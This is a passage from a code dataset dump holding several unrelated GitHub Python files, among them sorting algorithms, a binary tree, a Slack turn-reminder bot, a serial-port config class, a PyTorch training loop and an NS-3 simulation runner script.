self.resources.update(**resources)\n\n # hiddenRewards\n \"\"\"\n for raw_hiddenReward in hiddenRewards:\n\n hiddenReward = self.session.query(HiddenReward).filter_by(hiddenRewardId=raw_hiddenReward['hiddenRewardId']).first()\n if not hiddenReward:\n hiddenReward = HiddenReward(account=self)\n\n hiddenReward.update(**raw_hiddenReward)\n \"\"\"\n\n return super(Account, self).populate(*args, **kwargs)\n","repo_name":"mcorbug/foeBot","sub_path":"foe/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19217099847","text":"n = 5\nans=0\n# for i in range(2,n+1):\n# cnt=0\n# for j in range(1,n+1):\n# if i%j==0:\n# cnt+=1\n# if cnt<=2:\n# ans+=1\nlst=[False, False] + [True] * (n-1)\nanswer=[]\nfor i in range(2,n+1):\n if lst[i]:\n answer.append(i)\n for j in range(2*i, n+1,i):\n lst[j] = False\n\nprint(len(answer))","repo_name":"CompletelyPark/python","sub_path":"programmers/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22940777995","text":"\n\nfrom typing import List\nimport random\n\n\nclass Sorting:\n def bubble_sort(self, nums: List[int]) -> List[int]:\n '''\n Bubble Sort\n TIME COMPLEXITY: O(N^2)\n SPACE COMPLEXITY: O(1)\n '''\n n = len(nums)\n for i in range(n - 1):\n for j in range(0, n - i - 1):\n if nums[j] > nums[j + 1]:\n tmp = nums[j]\n nums[j] = nums[j + 1]\n nums[j + 1] = tmp\n return nums\n\n def merge_sort(self, nums: List[int]) -> List[int]:\n '''\n Merge Sort\n TIME COMPLEXITY: O(NlogN)\n SPACE COMPLEXITY: O(N)\n '''\n def merge(arr1: List[int], arr2: List[int]) -> List[int]:\n res = []\n i, j = 0, 0\n while i < len(arr1) and j < len(arr2):\n if arr1[i] < arr2[j]:\n res.append(arr1[i])\n i += 1\n else:\n res.append(arr2[j])\n j += 1\n if i < len(arr1):\n res += arr1[i:len(arr1)]\n else:\n res += arr2[j:len(arr2)]\n return res\n\n if len(nums) == 1:\n return nums\n\n mid = (len(nums) - 1) // 2\n arr1 = self.merge_sort(nums[:mid + 1])\n arr2 = self.merge_sort(nums[mid+1:])\n return merge(arr1, arr2)\n\n def quick_sort(self, nums: List[int]) -> List[int]:\n def random_pivot(arr: List[int], low: int, high: int):\n pivot = random.randrange(low, high)\n arr[pivot], arr[low] = arr[low], arr[pivot]\n\n def partition(arr: List[int], low: int, high: int):\n random_pivot(arr, low, high)\n pivot = arr[low]\n i = low + 1\n for j in range(i + 1, high + 1):\n if arr[j] < pivot:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i-1], arr[low] = arr[low], arr[i - 1]\n return i - 1\n\n def quick_sort(arr: List[int], low: int, high: int):\n # print(arr[low:high + 1])\n if low < high:\n pivot = partition(arr, low, high)\n quick_sort(arr, low, pivot - 1)\n quick_sort(arr, pivot + 1, high)\n return arr\n return quick_sort(nums, 0, len(nums) - 1)\n\n def process(self, input_nums: List[List[int]]):\n bubble_sort_result = []\n merge_sort_result = []\n quick_sort_result = []\n for nums in input_nums:\n print(nums)\n bubble_sort_result.append(self.bubble_sort(nums))\n print(nums)\n merge_sort_result.append(self.merge_sort(nums[:]))\n quick_sort_result.append(self.quick_sort(nums[:]))\n \n \n print(input_nums)\n\n # print(bubble_sort_result)\n # print(merge_sort_result)\n # print(quick_sort_result)\n # print(input_nums)\n\n\ninput_nums = [\n [3, 2, 5, 1, 7, 6, 8],\n [9, 8, 7, 6, 5, 4, 3, 2, 1],\n [2, 3, 3, 4, 5, 7, 8, 9],\n [2, 2, 2, 2, 2, 2, 2, 2]\n]\n\nSorting().process(input_nums)\n","repo_name":"vrdong/leetcode_challenge","sub_path":"sorting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20860684284","text":"import json\nimport serial\nimport sys\n\nfrom smartmeter.library import get_configured_logger\n\n\nclass SerialConfigException(ValueError):\n \"\"\"A placeholder class for all exceptions to the Serial Configuration\"\"\"\n pass\n\n\nclass SerialConfig:\n \"\"\"A class to provide the datastructure for all serial configuration details\"\"\"\n\n def __init__(\n self,\n baudrate: int = None,\n bytesize: int = None,\n parity: str = None,\n stopbits: int = None,\n xonxoff: bool = None,\n rtscts: bool = None,\n timeout: int = None,\n port: str = None\n ):\n \"\"\"\n Note: see pyserial for detail explaination of parameters\n\n :param baudrate: Default value: 9600\n :type baudrate: int\n\n :param bytesize: Default value: 7\n :type bytesize: int\n\n :param parity: Default value: E\n :type parity: str\n\n :param stopbits: Default value: 1\n :type stopbits: int\n\n :param xonxoff: Default value: False\n :type xonxoff: bool\n\n :param rtscts: Default value: False\n :type rtscts: bool\n\n :param timeout: Timeouts in seconds between telegrams. Default value: 20\n :type timeout: int\n\n :param port: Device path for serial device. Default value: /dev/ttyUSB0\n :type port: str\n\n \"\"\"\n # Assign variables:\n self.baudrate = baudrate if baudrate is not None else 9600\n self.bytesize = bytesize if bytesize is not None else serial.SEVENBITS\n self.parity = parity if parity is not None else serial.PARITY_EVEN\n self.stopbits = stopbits if stopbits is not None else serial.STOPBITS_ONE\n self.xonxoff = xonxoff if xonxoff is not None else False\n self.rtscts = rtscts if rtscts is not None else False\n self.timeout = timeout if timeout is not None else 20\n self.port = port if port is not None else \"/dev/ttyUSB0\"\n\n @property\n def baudrate(self):\n return self._baudrate\n\n @baudrate.setter\n def baudrate(self, value: int):\n if value is not None:\n self._baudrate = value\n else:\n raise SerialConfigException(\"Baudrate invalid\")\n\n @property\n def bytesize(self):\n return self._bytesize\n\n @bytesize.setter\n def bytesize(self, value: int):\n byte_sizes = [serial.FIVEBITS, serial.SIXBITS, serial.SEVENBITS, serial.EIGHTBITS]\n if value in byte_sizes:\n self._bytesize = value\n else:\n raise SerialConfigException(f\"Baudrate invalid. Valid values: {byte_sizes}\")\n\n @property\n def parity(self):\n return self._parity\n\n @parity.setter\n def parity(self, value: str):\n if value.upper() in serial.PARITY_NAMES.keys():\n self._parity = value.upper()\n else:\n raise SerialConfigException(f\"Parity invalid. Valid values: {list(serial.PARITY_NAMES.keys())}\")\n\n @property\n def stopbits(self):\n return self._stopbits\n\n @stopbits.setter\n def stopbits(self, value: int):\n stopbits = [serial.STOPBITS_ONE, serial.STOPBITS_ONE_POINT_FIVE, serial.STOPBITS_TWO]\n if value in stopbits:\n self._stopbits = value\n else:\n raise SerialConfigException(f\"Stopbits invalid. Valid values: {stopbits}\")\n\n @property\n def xonxoff(self):\n return self._xonxoff\n\n @xonxoff.setter\n def xonxoff(self, value: bool):\n xonxoff_values = [True, False]\n if value in xonxoff_values:\n self._xonxoff = value\n else:\n raise SerialConfigException(f\"Xonxoff invalid. Valid values: {xonxoff_values}\")\n\n @property\n def rtscts(self):\n return self._rtscts\n\n @rtscts.setter\n def rtscts(self, value: int):\n if value is not None:\n self._rtscts = value\n else:\n raise SerialConfigException(\"rtscts invalid\")\n\n @property\n def port(self):\n return self._port\n\n @port.setter\n def port(self, value: str):\n if value is not None:\n self._port = value\n else:\n raise SerialConfigException(\"Port invalid\")\n\n\ndef load_from_file(filename: str) -> SerialConfig:\n \"\"\"Load the configuration from a file\n\n :param filename: The filename to use\n :type filename: str\n\n :rtype: SerialConfig\n :returns: A SerialsConfig object with all needed settings\n\n :exception: SerialConfigException\n :exception: OSError\n \"\"\"\n\n logger = get_configured_logger()\n\n try:\n with open(filename) as file_handler:\n configuration_file_content = json.load(file_handler)\n except OSError as e:\n msg = f\"Can not process file '{filename}' because of eror: {str(e)}\"\n logger.critical(msg)\n sys.exit(1)\n\n # TODO:\n # - validate the dict we got from the configuration file\n # - return dict\n","repo_name":"jvingen/pi1","sub_path":"src/smartmeter/configuration/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9456579932","text":"\"\"\"\nHue tap button setup.\nControl fountain, conservatory lights, dining room lights, and media players (audio).\n\"\"\"\n\nimport appdaemon.plugins.hass.hassapi as hass\n\nclass Remote(hass.Hass):\n\n def initialize(self):\n\n if 'event' in self.args:\n self.listen_event(self.button_click, self.args['event'])\n\n\n def button_click(self, event_name, data, kwargs):\n \"\"\"\n data['event'] is either:\n\n 34 = button 1\n 16 = button 2\n 17 = button 3\n 18 = button 4\n\n \"\"\"\n self.log('testing')\n\n if data['id'] == self.args['id']: # Tap 1\n if data['event'] == 34: # Button 1\n self.toggle(self.args['entity_1'])\n elif data['event'] == 16: # Button 2\n self.toggle(self.args['entity_2'])\n elif data['event'] == 17: # Button 3\n self.toggle(self.args['entity_3'])\n elif data['event'] == 18: # Button 4\n self.toggle(self.args['entity_4'])\n\n\n # if any(self.args[\"entity_4\"] == \"playing\"):\n # for entity in self.args[\"entity_4\"]:\n # self.call_service(\"media_player.media_pause\",entity)\n # elif any(self.args[\"entity_4\"] == \"paused\"):\n # for entity in self.args[\"entity_4\"]:\n # self.call_service(\"media_player.media_play\",entity)\n","repo_name":"Aephir/HomeAssistantConfig","sub_path":"appdaemon/apps/remotes/hue_tap_1.py","file_name":"hue_tap_1.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5656602713","text":"# -*-coding:utf-8 -*-\n\"\"\"\n:创建时间: 2023/2/14 21:13\n:作者: 苍之幻灵\n:我的主页: https://cpcgskill.com\n:Github: https://github.com/cpcgskill\n:QQ: 2921251087\n:aboutcg: https://www.aboutcg.org/teacher/54335\n:bilibili: https://space.bilibili.com/351598127\n:爱发电: https://afdian.net/@Phantom_of_the_Cang\n\n\"\"\"\nfrom __future__ import unicode_literals, print_function, division\n\nimport contextlib\nimport json\nimport logging\nimport time\nimport random\n\nimport cachetools\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nimport sgt.models as sgt_models\nfrom sgt.db import get_grid_fs_bucket, get_collection\n\n# batch_size = 8192\n# save_interval = 8\nbatch_size = 256\nsave_interval = 256\nsuccess_sleep_seconds = 0.3\ndefault_sleep_seconds = 0.1\nfail_sleep_seconds = 0.6\nis_cat_do_time = True\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nlogging.basicConfig(\n level=logging.DEBUG,\n)\n\nlogger = logging.getLogger(name=__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef info(*args):\n logger.info(' '.join(['{}'.format(i) for i in args]))\n\n\n@contextlib.contextmanager\ndef timing(work_name):\n if is_cat_do_time:\n start = time.process_time()\n yield\n end = time.process_time()\n info('执行', work_name, '耗时', end - start)\n else:\n yield\n\n\n@cachetools.cached(cachetools.TTLCache(maxsize=16, ttl=30))\ndef load_data(checkpoint_id):\n fs_bucket = get_grid_fs_bucket()\n collection = get_collection('data')\n if collection.count_documents({'checkpoint_id': checkpoint_id}) > 0:\n docs = collection.find({'checkpoint_id': checkpoint_id})\n data_list = []\n label_list = []\n for i in docs:\n with fs_bucket.open_download_stream_by_name(i['data_file_name']) as stream:\n data_and_label = json.loads(stream.read())\n data, label = zip(*data_and_label)\n data = torch.Tensor(data)\n label = torch.Tensor(label)\n data_list.append(data)\n label_list.append(label)\n data = torch.cat(data_list)\n label = torch.cat(label_list)\n # 将训练数据的特征和标签组合\n dataset = TensorDataset(data, label)\n return DataLoader(\n dataset,\n batch_size,\n shuffle=True,\n pin_memory=True,\n )\n else:\n return None\n\n\ndef remake_tensor_by_device(d):\n return d.to(device) if d.device != device else d\n\n\ndef remake_tensor_list_by_device(*data_list):\n return (remake_tensor_by_device(d) for d in data_list)\n\n\ndef train_model(checkpoint_id):\n collection = get_collection('checkpoint')\n\n doc = collection.find_one({'_id': checkpoint_id})\n if doc is None:\n time.sleep(fail_sleep_seconds)\n return\n\n model = sgt_models.load_checkpoint_from_gridfs(doc['model_type'], doc['checkpoint_file_id'])\n\n data_iter = load_data(checkpoint_id)\n if data_iter is None:\n time.sleep(fail_sleep_seconds)\n return\n\n with timing('train_model(checkpoint_id={}, batch_size={}, save_interval={})'.format(\n checkpoint_id,\n batch_size,\n save_interval\n )):\n for _ in range(save_interval):\n x, y = remake_tensor_list_by_device(*next(iter(data_iter)))\n if torch.max(model.train(x, y).data) < 0.01:\n break\n\n if collection.count_documents({'_id': checkpoint_id}) < 1:\n return\n sgt_models.update_checkpoint_to_gridfs(model, doc['checkpoint_file_id'])\n\n\ndef train_all_model():\n collection = get_collection('checkpoint')\n checkpoint_count = collection.count_documents({})\n if checkpoint_count <= 0:\n time.sleep(success_sleep_seconds)\n return\n\n checkpoint_id_list = [doc['_id'] for doc in collection.find()]\n\n random.shuffle(checkpoint_id_list)\n\n for checkpoint_id in checkpoint_id_list:\n train_model(checkpoint_id)\n\n\ndef main():\n while True:\n try:\n train_all_model()\n time.sleep(success_sleep_seconds)\n except Exception as e:\n time.sleep(fail_sleep_seconds)\n logging.error('train_all_model({})'.format(repr(e)))\n\n\ndef test():\n while True:\n train_all_model()\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"cpcgskill/sgt","sub_path":"sgt/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40028150347","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r'^$', views.home),\n url(r'^main$', views.index),\n url(r'^reg$', views.reg),\n url(r'^login$', views.login),\n url(r'^quotes$', views.quotes),\n url(r'^logout$', views.logout),\n url(r'^addquote$', views.addquote),\n url(r'^addfav/(?P\\d+)$', views.addfav),\n url(r'^removefav/(?P\\d+)$', views.removefav),\n url(r'^user/(?P\\d+)$', views.userpage), \n]\n","repo_name":"jinjiang88/pythonbeltexam","sub_path":"apps/pythonexam_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38827078619","text":"import asyncio\nimport os\nimport slack\nfrom slack import RTMClient\nimport json\nimport logging\n\n# create logger\nlogger = logging.getLogger('loggymclogface')\nlogger.setLevel(logging.INFO)\n\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\n\n#TODO TOKEN = XXX\n#TODO combine datastructures into a 'players' list with players objects\nclient = slack.WebClient(token=TOKEN)\nPLAYERS = [\n# [ 'bob', 'slack user id' ],\n]\n\nCHANNEL_IDS = {\n # 'slack user id': 'slackbot channel w user',\n}\n\n\nCURRENT_TURN_POINTER = 2\nPESTER_TASK = None\n\ndef get_users():\n client.users_list()\n xx =client.users_list()\n for d in xx.data['members']:\n print(d['name'], d['id'], d['group'])\n\nasync def heartbeat():\n # for testing\n while True:\n print('hb')\n await asyncio.sleep(1)\n\nasync def schedule_pester(wait_t, web_client, channel_id, user):\n await asyncio.sleep(wait_t)\n web_client.chat_postMessage(\n channel=channel_id,\n text=f'hey there <@{user}>, it looks like you havent made a move in {wait_t} seconds. This is a casual reminder.',\n ) \n\n#def run_bot():\n@RTMClient.run_on(event=\"message\")\nasync def say_hello(**payload):\n global CURRENT_TURN_POINTER\n global PESTER_TASK\n data = payload['data']\n web_client = payload['web_client']\n name = data['username'] if 'username' in data else data.get('channel', None) \n logger.info(f'{name} says {data[\"text\"]}')\n if ('text' in data) and ('bot_id' not in data):\n channel_id = data['channel']\n if 'Hello' in data['text']:\n thread_ts = data['ts']\n user = data['user']\n\n web_client.chat_postMessage(\n channel=channel_id,\n text=f\"Hi <@{user}>!\",\n thread_ts=thread_ts\n )\n \n if 'reg' in data['text']:\n CHANNEL_IDS[data['user']] = channel_id\n with open('data.txt', 'w') as f:\n f.write(f'{data[\"user\"]}: {channel_id}\\n')\n web_client.chat_postMessage(\n channel=channel_id,\n text=f'registered <@{data[\"user\"]}>',\n ) \n try:\n if 'start' in data['text']:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn'\n ) \n if PESTER_TASK is not None:\n PESTER_TASK.cancel()\n PESTER_TASK = None\n PESTER_TASK = asyncio.ensure_future(schedule_pester(3600,\n web_client,\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][0]]))\n if data['text'] in ['done', 'Done']:\n if PLAYERS[CURRENT_TURN_POINTER][1] == data['user']:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'your turn is done'\n )\n CURRENT_TURN_POINTER += 1\n if CURRENT_TURN_POINTER == len(PLAYERS):\n CURRENT_TURN_POINTER = 0\n print(f'go {PLAYERS[CURRENT_TURN_POINTER][0]}!!!!')\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn. the first few turns will be boring and quick!'\n )\n if PESTER_TASK is not None:\n PESTER_TASK.cancel()\n PESTER_TASK = None\n PESTER_TASK = asyncio.ensure_future(schedule_pester(3600,\n web_client,\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][0]]))\n else:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[data['user']],\n text=f'stay engaged, it is not your turn'\n )\n if 'skip' in data['text']:\n print('skipping: ', PLAYERS[CURRENT_TURN_POINTER][0])\n CURRENT_TURN_POINTER += 1\n if CURRENT_TURN_POINTER == len(PLAYERS):\n CURRENT_TURN_POINTER = 0\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn'\n )\n except Exception as ex:\n print('exception!!!', ex)\n \n#rtm_client = RTMClient(token=TOKEN)\n#rtm_client.start()\n\nif __name__ == '__main__':\n #get_users()\n LOOP = asyncio.get_event_loop()\n rtm_client = RTMClient(token=TOKEN)\n# asyncio.ensure_future(heartbeat())\n LOOP.run_until_complete(rtm_client.start())\n\n# run_bot()\n","repo_name":"all2ham/civbot","sub_path":"civbot.py","file_name":"civbot.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13026358058","text":"\"\"\"\nASGI config for backend project.\n\nIt exposes the ASGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/howto/deployment/asgi/\n\"\"\"\n\nimport os\nfrom channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\nfrom channels.security.websocket import AllowedHostsOriginValidator\nfrom django.core.asgi import get_asgi_application\nfrom birdnest.consumers import PilotListConsumer\n\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings_dev')\n\n# set settings file to use\nuse_prod_settings = os.environ.get('DJANGO_PRODUCTION', 'false')\nif use_prod_settings == 'false':\n print('Using development settings.')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings_dev')\nelse:\n print('Using production settings.')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings')\n\ndjango_asgi_application = get_asgi_application()\n\nimport birdnest.routing\n\napplication = ProtocolTypeRouter(\n {\n \"http\": django_asgi_application,\n \"websocket\": URLRouter(birdnest.routing.urlpatterns),\n \"channel\": ChannelNameRouter(\n {\n \"pilot_list\": PilotListConsumer.as_asgi(),\n }\n ),\n }\n)\n","repo_name":"hjeronen/project_birdnest_2023","sub_path":"backend/backend/asgi.py","file_name":"asgi.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38251042113","text":"import wx\nfrom gdata import dat\n\nfrom resource import resource_path\n\nclass BuzzerConfigPanel(wx.Panel):\n \"\"\"This Panel holds the widgets to configure the keystrokes used on the buzzers.\"\"\"\n def __init__(self, parent, *args, **kwargs):\n wx.Panel.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.contestantAKey = wx.TextCtrl(self, size=(140, -1))\n self.contestantBKey = wx.TextCtrl(self, size=(140, -1))\n\n # we're using .lower() to make it appear as though the\n # interface uses lowercase letters, in the interest of\n # user-friendliness.\n self.contestantAKey.SetValue(str(dat.getKeycodes()[0] or '').lower())\n self.contestantBKey.SetValue(str(dat.getKeycodes()[1] or '').lower())\n \n self.finishButton = wx.Button(self, label='Finish')\n \n self.sizer = wx.GridBagSizer(4, 3)\n self.sizer.Add(wx.StaticText(self, label=\"Contestant A Key:\"), (0, 0))\n self.sizer.Add(wx.StaticText(self, label=\"Contestant B Key:\"), (0, 1))\n self.sizer.Add(self.contestantAKey, (1, 0))\n self.sizer.Add(self.contestantBKey, (1, 1))\n\n self.sizer.Add(self.finishButton, pos=(2, 0), span=(1,2), flag=wx.EXPAND)\n\n self.SetSizerAndFit(self.sizer)\n\n def updateFont(self, event):\n initialSize = dat.nameFontSize\n try:\n dat.nameFontSize = int( self.fontSizeSpinBox.GetValue())\n except:\n print(\"problem in getting font\")\n\n if initialSize != dat.nameFontSize:\n self.parent.parent.treePanel.updateTree()\n \nclass BuzzerConfigFrame(wx.Frame):\n def __init__(self, *args, **kwargs):\n \"\"\"Create the DemoFrame.\"\"\"\n wx.Frame.__init__(self, *args, **kwargs)\n\n # Add the Widget Panel\n self.Panel = BuzzerConfigPanel(self)\n self.Panel.finishButton.Bind(wx.EVT_BUTTON, self.finishAndUpdate)\n self.Fit()\n\n icon = wx.Icon()\n icon.CopyFromBitmap(wx.Bitmap(\n resource_path('resources/main_logo1.ico'), wx.BITMAP_TYPE_ANY))\n self.SetIcon(icon)\n \n def finishAndUpdate(self, event):\n dat.setKeycodes(self.Panel.contestantAKey.GetValue(), self.Panel.contestantBKey.GetValue())\n print('set keycodes')\n print(dat.buzzerConfig)\n self.OnQuit()\n \n def OnQuit(self, event=None):\n \"\"\"Exit application.\"\"\"\n self.Close()\n\n","repo_name":"parkhays/MCBuzzer","sub_path":"Source/buzzersetupframe.py","file_name":"buzzersetupframe.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29976817217","text":"\ndef vertical_txt(txt):\n lst=txt.split(' ')\n max=0\n lst2=[]\n for i in lst:\n if len(i)>max:\n max=len(i)\n for i in lst:\n lst2.append(i+' '*(max-len(i)))\n result=[]\n for i in range(max):\n temp=[]\n for j in lst2:\n temp.append(j[i])\n result.append(temp)\n return result\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"cBPj6yfALGfmeZQLG_17.py","file_name":"cBPj6yfALGfmeZQLG_17.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73192883612","text":"def min_max_sum(numbers):\n list_numbers = list(map(int, numbers.split()))\n min_numbers = min(list_numbers)\n max_numbers = max(list_numbers)\n sum_numbers = sum(list_numbers)\n\n return min_numbers, max_numbers, sum_numbers\n\n\nnums = input()\nmin_of_nums, max_of_nums, sum_of_nums = min_max_sum(nums)\nprint(f\"The minimum number is {min_of_nums}\")\nprint(f\"The maximum number is {max_of_nums}\")\nprint(f\"The sum number is: {sum_of_nums}\")","repo_name":"SAyvazova/SoftUni-Python","sub_path":"2_Fundamentals/4_Functions_Exercises/7_min_max_sum.py","file_name":"7_min_max_sum.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73077260571","text":"##########################################################\n# Arvore Genérica #\n# #\n# Necessário implementar um método getVal() no objeto #\n# em que neste método se irá retornar a chave usada na #\n# árvore #\n##########################################################\n\n\nclass BinaryTree:\n # Métodos Padrões\n def __init__(self, data=None, left=None, right=None):\n self.__data = data\n self.__left = left\n self.__right = right\n\n def __str__(self):\n return str(self.__data.getVal()) + \"\\n\"\n\n # Métodos de Imprimir\n def preOrder(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.preOrder()\n if self.__right is not None:\n self.__right.preOrder()\n print(self)\n\n def postOrder(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n print(self)\n if self.__left is not None:\n self.__left.postOrder()\n if self.__right is not None:\n self.__right.postOrder()\n\n def simmetric(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.simmetric()\n print(self)\n if self.__right is not None:\n self.__right.simmetric()\n\n def invertedIndex(self):\n if self.__data is None:\n print(\"Árvore Vazia\")\n return None\n if self.__left is not None:\n self.__left.invertedIndex()\n print(self.__data)\n if self.__right is not None:\n self.__right.invertedIndex()\n \n # Altura\n def height(self):\n if self.__left is None and self.__right is None:\n return 0 # Mudado aqui\n else:\n hl = 0\n hr = 0\n if self.__left is not None:\n hl = self.__left.height()\n if self.__right is not None:\n hr = self.__right.height()\n if hl > hr:\n return 1 + hl\n else:\n return 1 + hr\n\n # Inserção e Remoção\n def insert(self, data, comp):\n if self.__data is None:\n self.__data = data\n else:\n aux = None\n aux2 = self\n while aux2 is not None:\n aux = aux2\n if comp(aux2.__data.getVal(), data.getVal()) == 1:\n aux2 = aux2.__left\n else:\n aux2 = aux2.__right\n if comp(aux.__data.getVal(), data.getVal()) == 1:\n aux.__left = BinaryTree(data)\n else:\n aux.__right = BinaryTree(data)\n\n def remove(self, key, comp):\n if self.__data is None:\n return None\n if self.__data is not None:\n if comp(self.__data.getVal(), key) == 0:\n data = self.__data\n if self.__left is not None:\n self.__data = self.remove(self.__left.maxTree().getVal(),\n comp)\n elif self.__right is not None:\n self.__data = self.remove(self.__right.minTree().getVal(),\n comp)\n else:\n self.__data = None\n return data\n aux = None\n aux2 = self\n while aux2 is not None:\n if comp(aux2.__data.getVal(), key) == 0:\n break\n aux = aux2\n if comp(aux2.__data.getVal(), key) == 1:\n aux2 = aux2.__left\n else:\n aux2 = aux2.__right\n if aux2 is not None:\n data = aux2.__data\n if aux2.__left is None and aux2.__right is None:\n if aux.__left == aux2:\n aux.__left = None\n else:\n aux.__right = None\n elif aux2.__left is None and aux2.__right is not None:\n if aux.__left == aux2:\n aux.__left = aux2.__right\n else:\n aux.__right = aux2.__right\n elif aux2.__left is not None and aux2.__right is None:\n if aux.__left == aux2:\n aux.__left = aux2.__left\n else:\n aux.__right = aux2.__left\n else:\n aux2.__data = aux2.remove(aux2.__left.maxTree().getVal(), comp)\n return data\n\n # Máximos e Mínimos\n def maxTree(self):\n aux = self\n while aux.__right is not None:\n aux = aux.__right\n return aux.__data\n\n def minTree(self):\n aux = self\n while aux.__left is not None:\n aux = aux.__left\n return aux.__data\n\n # Busca\n def search(self, key, comp):\n aux = self\n while aux is not None:\n if comp(aux.__data.getVal(), key) == 0:\n return aux.__data\n if comp(aux.__data.getVal(), key) == 1:\n aux = aux.__left\n else:\n aux = aux.__right\n","repo_name":"elheremes/EDII_arvores","sub_path":"BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20619472078","text":"#This script is used to automate the waf commands that run compression simulation in NS-3\n#It will run through high entropy first then it will run through low entropy \n#This script changes the number of packets by 500 each time.\n\n#Needed to run command line arguments in python\nimport os\n\n#Example run of compression sim using waf commands for reference\n#In this case every parameter is present.\n#./waf --run \"4node-compression --outputFile=./test.dat --entropy=h \n#--numPackets=1000 --packetSize=1024 --interPacketTime=.0000001 --s0p0Delay=30ms \n#--p0p1Delay=30ms --p1r0Delay=30ms --s0p0DataRate=5Mbps --p0p1DataRate=4Mbps \n#--p1r0DataRate=5Mbps --queueMode=b --s0QueueSize=655350000 --p0QueueSize=655350000 \n#--p1QueueSize=655350000 --compression=1\"\n\n#Directory where NS-3 is located waf commands can be run here.\npathTo = \"/home/mario/repos/ns-allinone-3.14.1/ns-3.14.1\"\n\n#This command changes the directory to where the waf commands are enabled\nos.chdir(pathTo)\n\n#The below command is a simple example waf command of how to execute the compression simulation.\n#os.system('./waf --run \"compression-sim --numPackets=50 --packetSize=500\"')\n\ncompression_args = {}\n\n#Experiment Settings Default Values\ncompression_args['compression'] = '1'\ncompression_args['queueMode'] = 'p'\ncompression_args['entropy'] = 'h'\n\ncompression_args['packetSize'] = '1100'\ncompression_args['numPackets'] = '500'\ncompression_args['interPacketTime'] = '0.00000001'\n\ncompression_args['s0QueueSize'] = '2000'\ncompression_args['p0QueueSize'] = '1000' #Compressor Transmission queue size\ncompression_args['p1QueueSize'] = '2000'\n\ncompression_args['p0p1DataRate'] = '1Mbps' #Compression link\ncompression_args['s0p0DataRate'] = '5Mbps' \ncompression_args['p1r0DataRate'] = '5Mbps'\n\ncompression_args['s0p0Delay']='30ms'\ncompression_args['p0p1Delay']='30ms'\ncompression_args['p1r0Delay']='30ms'\n\n#change values here to alter the name of the first half outputfile\ncompression_args['outputFile'] = './test' + '_6Mbps_' + '_num_of_packets_'\n\nbandwidth = ['1Mbps', '4Mbps', '5Mbps', '6Mbps']\n\n#automate compression simulation run for high and low 